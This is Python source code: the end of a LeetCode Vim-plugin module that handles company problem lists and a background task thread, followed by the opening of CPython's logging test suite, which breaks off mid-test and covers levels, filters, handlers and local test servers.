_echoerr('cannot get problems of the company')
return {'company_name': company_slug, 'problems': []}
company_tag = res.json()['data']['companyTag']
if not company_tag:
_echoerr('cannot get problems of the company')
return {'company_name': company_slug, 'problems': []}
if company_tag['frequencies']:
id_to_frequency_map = json.loads(company_tag['frequencies'])
else:
id_to_frequency_map = {}
def process_problem(p):
stats = json.loads(p['stats'])
return {
'state': _state_to_flag(p['status']),
'id': p['questionId'],
'fid': p['questionFrontendId'],
'title': p['title'],
'slug': p['titleSlug'],
'paid_only': p['isPaidOnly'],
'ac_rate': stats['totalAcceptedRaw'] / stats['totalSubmissionRaw'],
'level': p['difficulty'],
'favor': False,
'frequencies': id_to_frequency_map.get(p['questionId'],
EMPTY_FREQUENCIES)[4:]}
return {
'company_name': company_tag['name'],
'problems': [process_problem(p) for p in company_tag['questions']]}
def _thread_main():
global task_running, task_done, task_output, task_err
while True:
task_trigger.acquire()
task_running = True
task_done = False
task_output = None
task_err = ''
log.info('task thread input: name="%s" input="%s"', task_name, task_input)
try:
if task_name == 'test_solution':
task_output = test_solution(*task_input)
elif task_name == 'submit_solution':
task_output = submit_solution(*task_input)
except BaseException as e:
task_err = str(e)
log.info('task thread output: name="%s" output="%s" error="%s"', task_name, task_output,
task_err)
task_running = False
task_done = True
def _in_task():
return current_thread() == task_thread
def _echoerr(s):
global task_err
if _in_task():
task_err = s
else:
print(s)
def _unescape_with_Chinese(code):
for ch in set(re.findall(r'\\u\w{4}', code)):
code = code.replace(ch, ch.encode('utf-8').decode('unicode_escape'))
log.info("code is %s", code)
return code.splitlines()
task_thread = Thread(target=_thread_main, daemon=True)
task_thread.start()
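# --- Illustrative sketch (not part of the plugin's public interface) ---
# A hedged example of how the semaphore-driven task machinery above is meant to be
# consumed: kick off an async submission, then poll the module-level flags until the
# worker thread reports completion. The plugin itself polls these flags from the Vim
# side; the sleep-based loop here is only for illustration, and it ignores the small
# window before the worker thread clears task_done from a previous run.
def _example_poll_async_submit(slug, filetype, code):
    if not submit_solution_async(slug, filetype, code):
        return None               # another task is already running
    while not task_done:          # the worker thread sets this flag when finished
        time.sleep(0.2)
    if task_err:
        _echoerr(task_err)
        return None
    return task_output            # the result dict built by submit_solution()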
|
test_logging.py
|
# Copyright 2001-2019 by Vinay Sajip. All Rights Reserved.
#
# Permission to use, copy, modify, and distribute this software and its
# documentation for any purpose and without fee is hereby granted,
# provided that the above copyright notice appear in all copies and that
# both that copyright notice and this permission notice appear in
# supporting documentation, and that the name of Vinay Sajip
# not be used in advertising or publicity pertaining to distribution
# of the software without specific, written prior permission.
# VINAY SAJIP DISCLAIMS ALL WARRANTIES WITH REGARD TO THIS SOFTWARE, INCLUDING
# ALL IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS. IN NO EVENT SHALL
# VINAY SAJIP BE LIABLE FOR ANY SPECIAL, INDIRECT OR CONSEQUENTIAL DAMAGES OR
# ANY DAMAGES WHATSOEVER RESULTING FROM LOSS OF USE, DATA OR PROFITS, WHETHER
# IN AN ACTION OF CONTRACT, NEGLIGENCE OR OTHER TORTIOUS ACTION, ARISING OUT
# OF OR IN CONNECTION WITH THE USE OR PERFORMANCE OF THIS SOFTWARE.
"""Test harness for the logging module. Run all tests.
Copyright (C) 2001-2019 Vinay Sajip. All Rights Reserved.
"""
import logging
import logging.handlers
import logging.config
import codecs
import configparser
import copy
import datetime
import pathlib
import pickle
import io
import gc
import json
import os
import queue
import random
import re
import socket
import struct
import sys
import tempfile
from test.support.script_helper import assert_python_ok, assert_python_failure
from test import support
from test.support import socket_helper
from test.support.logging_helper import TestHandler
import textwrap
import threading
import time
import unittest
import warnings
import weakref
import asyncore
from http.server import HTTPServer, BaseHTTPRequestHandler
import smtpd
from urllib.parse import urlparse, parse_qs
from socketserver import (ThreadingUDPServer, DatagramRequestHandler,
ThreadingTCPServer, StreamRequestHandler)
try:
import win32evtlog, win32evtlogutil, pywintypes
except ImportError:
win32evtlog = win32evtlogutil = pywintypes = None
try:
import zlib
except ImportError:
pass
class BaseTest(unittest.TestCase):
"""Base class for logging tests."""
log_format = "%(name)s -> %(levelname)s: %(message)s"
expected_log_pat = r"^([\w.]+) -> (\w+): (\d+)$"
message_num = 0
def setUp(self):
"""Setup the default logging stream to an internal StringIO instance,
so that we can examine log output as we want."""
self._threading_key = support.threading_setup()
logger_dict = logging.getLogger().manager.loggerDict
logging._acquireLock()
try:
self.saved_handlers = logging._handlers.copy()
self.saved_handler_list = logging._handlerList[:]
self.saved_loggers = saved_loggers = logger_dict.copy()
self.saved_name_to_level = logging._nameToLevel.copy()
self.saved_level_to_name = logging._levelToName.copy()
self.logger_states = logger_states = {}
for name in saved_loggers:
logger_states[name] = getattr(saved_loggers[name],
'disabled', None)
finally:
logging._releaseLock()
# Set two unused loggers
self.logger1 = logging.getLogger("\xab\xd7\xbb")
self.logger2 = logging.getLogger("\u013f\u00d6\u0047")
self.root_logger = logging.getLogger("")
self.original_logging_level = self.root_logger.getEffectiveLevel()
self.stream = io.StringIO()
self.root_logger.setLevel(logging.DEBUG)
self.root_hdlr = logging.StreamHandler(self.stream)
self.root_formatter = logging.Formatter(self.log_format)
self.root_hdlr.setFormatter(self.root_formatter)
if self.logger1.hasHandlers():
hlist = self.logger1.handlers + self.root_logger.handlers
raise AssertionError('Unexpected handlers: %s' % hlist)
if self.logger2.hasHandlers():
hlist = self.logger2.handlers + self.root_logger.handlers
raise AssertionError('Unexpected handlers: %s' % hlist)
self.root_logger.addHandler(self.root_hdlr)
self.assertTrue(self.logger1.hasHandlers())
self.assertTrue(self.logger2.hasHandlers())
def tearDown(self):
"""Remove our logging stream, and restore the original logging
level."""
self.stream.close()
self.root_logger.removeHandler(self.root_hdlr)
while self.root_logger.handlers:
h = self.root_logger.handlers[0]
self.root_logger.removeHandler(h)
h.close()
self.root_logger.setLevel(self.original_logging_level)
logging._acquireLock()
try:
logging._levelToName.clear()
logging._levelToName.update(self.saved_level_to_name)
logging._nameToLevel.clear()
logging._nameToLevel.update(self.saved_name_to_level)
logging._handlers.clear()
logging._handlers.update(self.saved_handlers)
logging._handlerList[:] = self.saved_handler_list
manager = logging.getLogger().manager
manager.disable = 0
loggerDict = manager.loggerDict
loggerDict.clear()
loggerDict.update(self.saved_loggers)
logger_states = self.logger_states
for name in self.logger_states:
if logger_states[name] is not None:
self.saved_loggers[name].disabled = logger_states[name]
finally:
logging._releaseLock()
self.doCleanups()
support.threading_cleanup(*self._threading_key)
def assert_log_lines(self, expected_values, stream=None, pat=None):
"""Match the collected log lines against the regular expression
self.expected_log_pat, and compare the extracted group values to
the expected_values list of tuples."""
stream = stream or self.stream
pat = re.compile(pat or self.expected_log_pat)
actual_lines = stream.getvalue().splitlines()
self.assertEqual(len(actual_lines), len(expected_values))
for actual, expected in zip(actual_lines, expected_values):
match = pat.search(actual)
if not match:
self.fail("Log line does not match expected pattern:\n" +
actual)
self.assertEqual(tuple(match.groups()), expected)
s = stream.read()
if s:
self.fail("Remaining output at end of log stream:\n" + s)
def next_message(self):
"""Generate a message consisting solely of an auto-incrementing
integer."""
self.message_num += 1
return "%d" % self.message_num
class BuiltinLevelsTest(BaseTest):
"""Test builtin levels and their inheritance."""
def test_flat(self):
# Logging levels in a flat logger namespace.
m = self.next_message
ERR = logging.getLogger("ERR")
ERR.setLevel(logging.ERROR)
INF = logging.LoggerAdapter(logging.getLogger("INF"), {})
INF.setLevel(logging.INFO)
DEB = logging.getLogger("DEB")
DEB.setLevel(logging.DEBUG)
# These should log.
ERR.log(logging.CRITICAL, m())
ERR.error(m())
INF.log(logging.CRITICAL, m())
INF.error(m())
INF.warning(m())
INF.info(m())
DEB.log(logging.CRITICAL, m())
DEB.error(m())
DEB.warning(m())
DEB.info(m())
DEB.debug(m())
# These should not log.
ERR.warning(m())
ERR.info(m())
ERR.debug(m())
INF.debug(m())
self.assert_log_lines([
('ERR', 'CRITICAL', '1'),
('ERR', 'ERROR', '2'),
('INF', 'CRITICAL', '3'),
('INF', 'ERROR', '4'),
('INF', 'WARNING', '5'),
('INF', 'INFO', '6'),
('DEB', 'CRITICAL', '7'),
('DEB', 'ERROR', '8'),
('DEB', 'WARNING', '9'),
('DEB', 'INFO', '10'),
('DEB', 'DEBUG', '11'),
])
def test_nested_explicit(self):
# Logging levels in a nested namespace, all explicitly set.
m = self.next_message
INF = logging.getLogger("INF")
INF.setLevel(logging.INFO)
INF_ERR = logging.getLogger("INF.ERR")
INF_ERR.setLevel(logging.ERROR)
# These should log.
INF_ERR.log(logging.CRITICAL, m())
INF_ERR.error(m())
# These should not log.
INF_ERR.warning(m())
INF_ERR.info(m())
INF_ERR.debug(m())
self.assert_log_lines([
('INF.ERR', 'CRITICAL', '1'),
('INF.ERR', 'ERROR', '2'),
])
def test_nested_inherited(self):
# Logging levels in a nested namespace, inherited from parent loggers.
m = self.next_message
INF = logging.getLogger("INF")
INF.setLevel(logging.INFO)
INF_ERR = logging.getLogger("INF.ERR")
INF_ERR.setLevel(logging.ERROR)
INF_UNDEF = logging.getLogger("INF.UNDEF")
INF_ERR_UNDEF = logging.getLogger("INF.ERR.UNDEF")
UNDEF = logging.getLogger("UNDEF")
# These should log.
INF_UNDEF.log(logging.CRITICAL, m())
INF_UNDEF.error(m())
INF_UNDEF.warning(m())
INF_UNDEF.info(m())
INF_ERR_UNDEF.log(logging.CRITICAL, m())
INF_ERR_UNDEF.error(m())
# These should not log.
INF_UNDEF.debug(m())
INF_ERR_UNDEF.warning(m())
INF_ERR_UNDEF.info(m())
INF_ERR_UNDEF.debug(m())
self.assert_log_lines([
('INF.UNDEF', 'CRITICAL', '1'),
('INF.UNDEF', 'ERROR', '2'),
('INF.UNDEF', 'WARNING', '3'),
('INF.UNDEF', 'INFO', '4'),
('INF.ERR.UNDEF', 'CRITICAL', '5'),
('INF.ERR.UNDEF', 'ERROR', '6'),
])
def test_nested_with_virtual_parent(self):
# Logging levels when some parent does not exist yet.
m = self.next_message
INF = logging.getLogger("INF")
GRANDCHILD = logging.getLogger("INF.BADPARENT.UNDEF")
CHILD = logging.getLogger("INF.BADPARENT")
INF.setLevel(logging.INFO)
# These should log.
GRANDCHILD.log(logging.FATAL, m())
GRANDCHILD.info(m())
CHILD.log(logging.FATAL, m())
CHILD.info(m())
# These should not log.
GRANDCHILD.debug(m())
CHILD.debug(m())
self.assert_log_lines([
('INF.BADPARENT.UNDEF', 'CRITICAL', '1'),
('INF.BADPARENT.UNDEF', 'INFO', '2'),
('INF.BADPARENT', 'CRITICAL', '3'),
('INF.BADPARENT', 'INFO', '4'),
])
def test_regression_22386(self):
"""See issue #22386 for more information."""
self.assertEqual(logging.getLevelName('INFO'), logging.INFO)
self.assertEqual(logging.getLevelName(logging.INFO), 'INFO')
def test_issue27935(self):
fatal = logging.getLevelName('FATAL')
self.assertEqual(fatal, logging.FATAL)
def test_regression_29220(self):
"""See issue #29220 for more information."""
logging.addLevelName(logging.INFO, '')
self.addCleanup(logging.addLevelName, logging.INFO, 'INFO')
self.assertEqual(logging.getLevelName(logging.INFO), '')
self.assertEqual(logging.getLevelName(logging.NOTSET), 'NOTSET')
self.assertEqual(logging.getLevelName('NOTSET'), logging.NOTSET)
class BasicFilterTest(BaseTest):
"""Test the bundled Filter class."""
def test_filter(self):
# Only messages satisfying the specified criteria pass through the
# filter.
filter_ = logging.Filter("spam.eggs")
handler = self.root_logger.handlers[0]
try:
handler.addFilter(filter_)
spam = logging.getLogger("spam")
spam_eggs = logging.getLogger("spam.eggs")
spam_eggs_fish = logging.getLogger("spam.eggs.fish")
spam_bakedbeans = logging.getLogger("spam.bakedbeans")
spam.info(self.next_message())
spam_eggs.info(self.next_message()) # Good.
spam_eggs_fish.info(self.next_message()) # Good.
spam_bakedbeans.info(self.next_message())
self.assert_log_lines([
('spam.eggs', 'INFO', '2'),
('spam.eggs.fish', 'INFO', '3'),
])
finally:
handler.removeFilter(filter_)
def test_callable_filter(self):
# Only messages satisfying the specified criteria pass through the
# filter.
def filterfunc(record):
parts = record.name.split('.')
prefix = '.'.join(parts[:2])
return prefix == 'spam.eggs'
handler = self.root_logger.handlers[0]
try:
handler.addFilter(filterfunc)
spam = logging.getLogger("spam")
spam_eggs = logging.getLogger("spam.eggs")
spam_eggs_fish = logging.getLogger("spam.eggs.fish")
spam_bakedbeans = logging.getLogger("spam.bakedbeans")
spam.info(self.next_message())
spam_eggs.info(self.next_message()) # Good.
spam_eggs_fish.info(self.next_message()) # Good.
spam_bakedbeans.info(self.next_message())
self.assert_log_lines([
('spam.eggs', 'INFO', '2'),
('spam.eggs.fish', 'INFO', '3'),
])
finally:
handler.removeFilter(filterfunc)
def test_empty_filter(self):
f = logging.Filter()
r = logging.makeLogRecord({'name': 'spam.eggs'})
self.assertTrue(f.filter(r))
#
# First, we define our levels. There can be as many as you want - the only
# limitations are that they should be integers, the lowest should be > 0 and
# larger values mean less information being logged. If you need specific
# level values which do not fit into these limitations, you can use a
# mapping dictionary to convert between your application levels and the
# logging system.
#
SILENT = 120
TACITURN = 119
TERSE = 118
EFFUSIVE = 117
SOCIABLE = 116
VERBOSE = 115
TALKATIVE = 114
GARRULOUS = 113
CHATTERBOX = 112
BORING = 111
LEVEL_RANGE = range(BORING, SILENT + 1)
#
# Next, we define names for our levels. You don't need to do this - in which
# case the system will use "Level n" to denote the text for the level.
#
my_logging_levels = {
SILENT : 'Silent',
TACITURN : 'Taciturn',
TERSE : 'Terse',
EFFUSIVE : 'Effusive',
SOCIABLE : 'Sociable',
VERBOSE : 'Verbose',
TALKATIVE : 'Talkative',
GARRULOUS : 'Garrulous',
CHATTERBOX : 'Chatterbox',
BORING : 'Boring',
}
class GarrulousFilter(logging.Filter):
"""A filter which blocks garrulous messages."""
def filter(self, record):
return record.levelno != GARRULOUS
class VerySpecificFilter(logging.Filter):
"""A filter which blocks sociable and taciturn messages."""
def filter(self, record):
return record.levelno not in [SOCIABLE, TACITURN]
class CustomLevelsAndFiltersTest(BaseTest):
"""Test various filtering possibilities with custom logging levels."""
# Skip the logger name group.
expected_log_pat = r"^[\w.]+ -> (\w+): (\d+)$"
def setUp(self):
BaseTest.setUp(self)
for k, v in my_logging_levels.items():
logging.addLevelName(k, v)
def log_at_all_levels(self, logger):
for lvl in LEVEL_RANGE:
logger.log(lvl, self.next_message())
def test_logger_filter(self):
# Filter at logger level.
self.root_logger.setLevel(VERBOSE)
# Levels >= 'Verbose' are good.
self.log_at_all_levels(self.root_logger)
self.assert_log_lines([
('Verbose', '5'),
('Sociable', '6'),
('Effusive', '7'),
('Terse', '8'),
('Taciturn', '9'),
('Silent', '10'),
])
def test_handler_filter(self):
# Filter at handler level.
self.root_logger.handlers[0].setLevel(SOCIABLE)
try:
# Levels >= 'Sociable' are good.
self.log_at_all_levels(self.root_logger)
self.assert_log_lines([
('Sociable', '6'),
('Effusive', '7'),
('Terse', '8'),
('Taciturn', '9'),
('Silent', '10'),
])
finally:
self.root_logger.handlers[0].setLevel(logging.NOTSET)
def test_specific_filters(self):
# Set a specific filter object on the handler, and then add another
# filter object on the logger itself.
handler = self.root_logger.handlers[0]
specific_filter = None
garr = GarrulousFilter()
handler.addFilter(garr)
try:
self.log_at_all_levels(self.root_logger)
first_lines = [
# Notice how 'Garrulous' is missing
('Boring', '1'),
('Chatterbox', '2'),
('Talkative', '4'),
('Verbose', '5'),
('Sociable', '6'),
('Effusive', '7'),
('Terse', '8'),
('Taciturn', '9'),
('Silent', '10'),
]
self.assert_log_lines(first_lines)
specific_filter = VerySpecificFilter()
self.root_logger.addFilter(specific_filter)
self.log_at_all_levels(self.root_logger)
self.assert_log_lines(first_lines + [
# Not only 'Garrulous' is still missing, but also 'Sociable'
# and 'Taciturn'
('Boring', '11'),
('Chatterbox', '12'),
('Talkative', '14'),
('Verbose', '15'),
('Effusive', '17'),
('Terse', '18'),
('Silent', '20'),
])
finally:
if specific_filter:
self.root_logger.removeFilter(specific_filter)
handler.removeFilter(garr)
class HandlerTest(BaseTest):
def test_name(self):
h = logging.Handler()
h.name = 'generic'
self.assertEqual(h.name, 'generic')
h.name = 'anothergeneric'
self.assertEqual(h.name, 'anothergeneric')
self.assertRaises(NotImplementedError, h.emit, None)
def test_builtin_handlers(self):
# We can't actually *use* too many handlers in the tests,
# but we can try instantiating them with various options
if sys.platform in ('linux', 'darwin'):
for existing in (True, False):
fd, fn = tempfile.mkstemp()
os.close(fd)
if not existing:
os.unlink(fn)
h = logging.handlers.WatchedFileHandler(fn, delay=True)
if existing:
dev, ino = h.dev, h.ino
self.assertEqual(dev, -1)
self.assertEqual(ino, -1)
r = logging.makeLogRecord({'msg': 'Test'})
h.handle(r)
# Now remove the file.
os.unlink(fn)
self.assertFalse(os.path.exists(fn))
# The next call should recreate the file.
h.handle(r)
self.assertTrue(os.path.exists(fn))
else:
self.assertEqual(h.dev, -1)
self.assertEqual(h.ino, -1)
h.close()
if existing:
os.unlink(fn)
if sys.platform == 'darwin':
sockname = '/var/run/syslog'
else:
sockname = '/dev/log'
try:
h = logging.handlers.SysLogHandler(sockname)
self.assertEqual(h.facility, h.LOG_USER)
self.assertTrue(h.unixsocket)
h.close()
except OSError: # syslogd might not be available
pass
for method in ('GET', 'POST', 'PUT'):
if method == 'PUT':
self.assertRaises(ValueError, logging.handlers.HTTPHandler,
'localhost', '/log', method)
else:
h = logging.handlers.HTTPHandler('localhost', '/log', method)
h.close()
h = logging.handlers.BufferingHandler(0)
r = logging.makeLogRecord({})
self.assertTrue(h.shouldFlush(r))
h.close()
h = logging.handlers.BufferingHandler(1)
self.assertFalse(h.shouldFlush(r))
h.close()
def test_path_objects(self):
"""
Test that Path objects are accepted as filename arguments to handlers.
See Issue #27493.
"""
fd, fn = tempfile.mkstemp()
os.close(fd)
os.unlink(fn)
pfn = pathlib.Path(fn)
cases = (
(logging.FileHandler, (pfn, 'w')),
(logging.handlers.RotatingFileHandler, (pfn, 'a')),
(logging.handlers.TimedRotatingFileHandler, (pfn, 'h')),
)
if sys.platform in ('linux', 'darwin'):
cases += ((logging.handlers.WatchedFileHandler, (pfn, 'w')),)
for cls, args in cases:
h = cls(*args)
self.assertTrue(os.path.exists(fn))
h.close()
os.unlink(fn)
@unittest.skipIf(os.name == 'nt', 'WatchedFileHandler not appropriate for Windows.')
def test_race(self):
# Issue #14632 refers.
def remove_loop(fname, tries):
for _ in range(tries):
try:
os.unlink(fname)
self.deletion_time = time.time()
except OSError:
pass
time.sleep(0.004 * random.randint(0, 4))
del_count = 500
log_count = 500
self.handle_time = None
self.deletion_time = None
for delay in (False, True):
fd, fn = tempfile.mkstemp('.log', 'test_logging-3-')
os.close(fd)
remover = threading.Thread(target=remove_loop, args=(fn, del_count))
remover.daemon = True
remover.start()
h = logging.handlers.WatchedFileHandler(fn, delay=delay)
f = logging.Formatter('%(asctime)s: %(levelname)s: %(message)s')
h.setFormatter(f)
try:
for _ in range(log_count):
time.sleep(0.005)
r = logging.makeLogRecord({'msg': 'testing' })
try:
self.handle_time = time.time()
h.handle(r)
except Exception:
print('Deleted at %s, '
'opened at %s' % (self.deletion_time,
self.handle_time))
raise
finally:
remover.join()
h.close()
if os.path.exists(fn):
os.unlink(fn)
# The implementation relies on os.register_at_fork existing, but we test
# based on os.fork existing because that is what users and this test use.
# This helps ensure that when fork exists (the important concept) that the
# register_at_fork mechanism is also present and used.
@unittest.skipIf(not hasattr(os, 'fork'), 'Test requires os.fork().')
def test_post_fork_child_no_deadlock(self):
"""Ensure child logging locks are not held; bpo-6721 & bpo-36533."""
class _OurHandler(logging.Handler):
def __init__(self):
super().__init__()
self.sub_handler = logging.StreamHandler(
stream=open('/dev/null', 'wt'))
def emit(self, record):
self.sub_handler.acquire()
try:
self.sub_handler.emit(record)
finally:
self.sub_handler.release()
self.assertEqual(len(logging._handlers), 0)
refed_h = _OurHandler()
self.addCleanup(refed_h.sub_handler.stream.close)
refed_h.name = 'because we need at least one for this test'
self.assertGreater(len(logging._handlers), 0)
self.assertGreater(len(logging._at_fork_reinit_lock_weakset), 1)
test_logger = logging.getLogger('test_post_fork_child_no_deadlock')
test_logger.addHandler(refed_h)
test_logger.setLevel(logging.DEBUG)
locks_held__ready_to_fork = threading.Event()
fork_happened__release_locks_and_end_thread = threading.Event()
def lock_holder_thread_fn():
logging._acquireLock()
try:
refed_h.acquire()
try:
# Tell the main thread to do the fork.
locks_held__ready_to_fork.set()
# If the deadlock bug exists, the fork will happen
# without dealing with the locks we hold, deadlocking
# the child.
# Wait for a successful fork or an unreasonable amount of
# time before releasing our locks. To avoid a timing based
# test we'd need communication from os.fork() as to when it
# has actually happened. Given this is a regression test
# for a fixed issue, potentially less reliably detecting
# regression via timing is acceptable for simplicity.
# The test will always take at least this long. :(
fork_happened__release_locks_and_end_thread.wait(0.5)
finally:
refed_h.release()
finally:
logging._releaseLock()
lock_holder_thread = threading.Thread(
target=lock_holder_thread_fn,
name='test_post_fork_child_no_deadlock lock holder')
lock_holder_thread.start()
locks_held__ready_to_fork.wait()
pid = os.fork()
if pid == 0:
# Child process
try:
test_logger.info(r'Child process did not deadlock. \o/')
finally:
os._exit(0)
else:
# Parent process
test_logger.info(r'Parent process returned from fork. \o/')
fork_happened__release_locks_and_end_thread.set()
lock_holder_thread.join()
support.wait_process(pid, exitcode=0)
class BadStream(object):
def write(self, data):
raise RuntimeError('deliberate mistake')
class TestStreamHandler(logging.StreamHandler):
def handleError(self, record):
self.error_record = record
class StreamWithIntName(object):
level = logging.NOTSET
name = 2
class StreamHandlerTest(BaseTest):
def test_error_handling(self):
h = TestStreamHandler(BadStream())
r = logging.makeLogRecord({})
old_raise = logging.raiseExceptions
try:
h.handle(r)
self.assertIs(h.error_record, r)
h = logging.StreamHandler(BadStream())
with support.captured_stderr() as stderr:
h.handle(r)
msg = '\nRuntimeError: deliberate mistake\n'
self.assertIn(msg, stderr.getvalue())
logging.raiseExceptions = False
with support.captured_stderr() as stderr:
h.handle(r)
self.assertEqual('', stderr.getvalue())
finally:
logging.raiseExceptions = old_raise
def test_stream_setting(self):
"""
Test setting the handler's stream
"""
h = logging.StreamHandler()
stream = io.StringIO()
old = h.setStream(stream)
self.assertIs(old, sys.stderr)
actual = h.setStream(old)
self.assertIs(actual, stream)
# test that setting to existing value returns None
actual = h.setStream(old)
self.assertIsNone(actual)
def test_can_represent_stream_with_int_name(self):
h = logging.StreamHandler(StreamWithIntName())
self.assertEqual(repr(h), '<StreamHandler 2 (NOTSET)>')
# -- The following section could be moved into a server_helper.py module
# -- if it proves to be of wider utility than just test_logging
class TestSMTPServer(smtpd.SMTPServer):
"""
This class implements a test SMTP server.
:param addr: A (host, port) tuple which the server listens on.
You can specify a port value of zero: the server's
*port* attribute will hold the actual port number
used, which can be used in client connections.
:param handler: A callable which will be called to process
incoming messages. The handler will be passed
the client address tuple, who the message is from,
a list of recipients and the message data.
:param poll_interval: The interval, in seconds, used in the underlying
:func:`select` or :func:`poll` call by
:func:`asyncore.loop`.
:param sockmap: A dictionary which will be used to hold
:class:`asyncore.dispatcher` instances used by
:func:`asyncore.loop`. This avoids changing the
:mod:`asyncore` module's global state.
"""
def __init__(self, addr, handler, poll_interval, sockmap):
smtpd.SMTPServer.__init__(self, addr, None, map=sockmap,
decode_data=True)
self.port = self.socket.getsockname()[1]
self._handler = handler
self._thread = None
self._quit = False
self.poll_interval = poll_interval
def process_message(self, peer, mailfrom, rcpttos, data):
"""
Delegates to the handler passed in to the server's constructor.
Typically, this will be a test case method.
:param peer: The client (host, port) tuple.
:param mailfrom: The address of the sender.
:param rcpttos: The addresses of the recipients.
:param data: The message.
"""
self._handler(peer, mailfrom, rcpttos, data)
def start(self):
"""
Start the server running on a separate daemon thread.
"""
self._thread = t = threading.Thread(target=self.serve_forever,
args=(self.poll_interval,))
        t.daemon = True
t.start()
def serve_forever(self, poll_interval):
"""
Run the :mod:`asyncore` loop until normal termination
conditions arise.
:param poll_interval: The interval, in seconds, used in the underlying
:func:`select` or :func:`poll` call by
:func:`asyncore.loop`.
"""
while not self._quit:
asyncore.loop(poll_interval, map=self._map, count=1)
def stop(self):
"""
Stop the thread by closing the server instance.
Wait for the server thread to terminate.
"""
self._quit = True
support.join_thread(self._thread)
self._thread = None
self.close()
asyncore.close_all(map=self._map, ignore_all=True)
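# A minimal usage sketch for TestSMTPServer (illustration only; the real usage
# is in SMTPHandlerTest.test_basic further down).  Here on_message stands for
# any callable taking (peer, mailfrom, rcpttos, data):
#
#     sockmap = {}
#     server = TestSMTPServer(('localhost', 0), on_message, 0.001, sockmap)
#     server.start()
#     ...  # point an SMTPHandler at ('localhost', server.port)
#     server.stop()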
class ControlMixin(object):
"""
This mixin is used to start a server on a separate thread, and
shut it down programmatically. Request handling is simplified - instead
of needing to derive a suitable RequestHandler subclass, you just
provide a callable which will be passed each received request to be
processed.
:param handler: A handler callable which will be called with a
single parameter - the request - in order to
process the request. This handler is called on the
server thread, effectively meaning that requests are
processed serially. While not quite Web scale ;-),
this should be fine for testing applications.
:param poll_interval: The polling interval in seconds.
"""
def __init__(self, handler, poll_interval):
self._thread = None
self.poll_interval = poll_interval
self._handler = handler
self.ready = threading.Event()
def start(self):
"""
Create a daemon thread to run the server, and start it.
"""
self._thread = t = threading.Thread(target=self.serve_forever,
args=(self.poll_interval,))
        t.daemon = True
t.start()
def serve_forever(self, poll_interval):
"""
Run the server. Set the ready flag before entering the
service loop.
"""
self.ready.set()
super(ControlMixin, self).serve_forever(poll_interval)
def stop(self):
"""
Tell the server thread to stop, and wait for it to do so.
"""
self.shutdown()
if self._thread is not None:
support.join_thread(self._thread)
self._thread = None
self.server_close()
self.ready.clear()
class TestHTTPServer(ControlMixin, HTTPServer):
"""
An HTTP server which is controllable using :class:`ControlMixin`.
:param addr: A tuple with the IP address and port to listen on.
:param handler: A handler callable which will be called with a
single parameter - the request - in order to
process the request.
:param poll_interval: The polling interval in seconds.
:param log: Pass ``True`` to enable log messages.
"""
def __init__(self, addr, handler, poll_interval=0.5,
log=False, sslctx=None):
class DelegatingHTTPRequestHandler(BaseHTTPRequestHandler):
            def __getattr__(self, name):
if name.startswith('do_'):
return self.process_request
raise AttributeError(name)
def process_request(self):
self.server._handler(self)
def log_message(self, format, *args):
if log:
super(DelegatingHTTPRequestHandler,
self).log_message(format, *args)
HTTPServer.__init__(self, addr, DelegatingHTTPRequestHandler)
ControlMixin.__init__(self, handler, poll_interval)
self.sslctx = sslctx
def get_request(self):
try:
sock, addr = self.socket.accept()
if self.sslctx:
sock = self.sslctx.wrap_socket(sock, server_side=True)
except OSError as e:
# socket errors are silenced by the caller, print them here
sys.stderr.write("Got an error:\n%s\n" % e)
raise
return sock, addr
class TestTCPServer(ControlMixin, ThreadingTCPServer):
"""
A TCP server which is controllable using :class:`ControlMixin`.
:param addr: A tuple with the IP address and port to listen on.
:param handler: A handler callable which will be called with a single
parameter - the request - in order to process the request.
:param poll_interval: The polling interval in seconds.
    :param bind_and_activate: If True (the default), binds the server and
                              starts it listening. If False, you need to call
                              :meth:`server_bind` and :meth:`server_activate`
                              at some later time before calling :meth:`start`,
                              so that the server will set up the socket and
                              listen on it.
"""
allow_reuse_address = True
def __init__(self, addr, handler, poll_interval=0.5,
bind_and_activate=True):
class DelegatingTCPRequestHandler(StreamRequestHandler):
def handle(self):
self.server._handler(self)
ThreadingTCPServer.__init__(self, addr, DelegatingTCPRequestHandler,
bind_and_activate)
ControlMixin.__init__(self, handler, poll_interval)
def server_bind(self):
super(TestTCPServer, self).server_bind()
self.port = self.socket.getsockname()[1]
class TestUDPServer(ControlMixin, ThreadingUDPServer):
"""
A UDP server which is controllable using :class:`ControlMixin`.
:param addr: A tuple with the IP address and port to listen on.
:param handler: A handler callable which will be called with a
single parameter - the request - in order to
process the request.
:param poll_interval: The polling interval for shutdown requests,
in seconds.
    :param bind_and_activate: If True (the default), binds the server and
                              starts it listening. If False, you need to call
                              :meth:`server_bind` and :meth:`server_activate`
                              at some later time before calling :meth:`start`,
                              so that the server will set up the socket and
                              listen on it.
"""
def __init__(self, addr, handler, poll_interval=0.5,
bind_and_activate=True):
class DelegatingUDPRequestHandler(DatagramRequestHandler):
def handle(self):
self.server._handler(self)
def finish(self):
data = self.wfile.getvalue()
if data:
try:
super(DelegatingUDPRequestHandler, self).finish()
except OSError:
if not self.server._closed:
raise
ThreadingUDPServer.__init__(self, addr,
DelegatingUDPRequestHandler,
bind_and_activate)
ControlMixin.__init__(self, handler, poll_interval)
self._closed = False
def server_bind(self):
super(TestUDPServer, self).server_bind()
self.port = self.socket.getsockname()[1]
def server_close(self):
super(TestUDPServer, self).server_close()
self._closed = True
if hasattr(socket, "AF_UNIX"):
class TestUnixStreamServer(TestTCPServer):
address_family = socket.AF_UNIX
class TestUnixDatagramServer(TestUDPServer):
address_family = socket.AF_UNIX
# - end of server_helper section
class SMTPHandlerTest(BaseTest):
# bpo-14314, bpo-19665, bpo-34092: don't wait forever
TIMEOUT = support.LONG_TIMEOUT
def test_basic(self):
sockmap = {}
server = TestSMTPServer((socket_helper.HOST, 0), self.process_message, 0.001,
sockmap)
server.start()
addr = (socket_helper.HOST, server.port)
h = logging.handlers.SMTPHandler(addr, 'me', 'you', 'Log',
timeout=self.TIMEOUT)
self.assertEqual(h.toaddrs, ['you'])
self.messages = []
r = logging.makeLogRecord({'msg': 'Hello \u2713'})
self.handled = threading.Event()
h.handle(r)
self.handled.wait(self.TIMEOUT)
server.stop()
self.assertTrue(self.handled.is_set())
self.assertEqual(len(self.messages), 1)
peer, mailfrom, rcpttos, data = self.messages[0]
self.assertEqual(mailfrom, 'me')
self.assertEqual(rcpttos, ['you'])
self.assertIn('\nSubject: Log\n', data)
self.assertTrue(data.endswith('\n\nHello \u2713'))
h.close()
def process_message(self, *args):
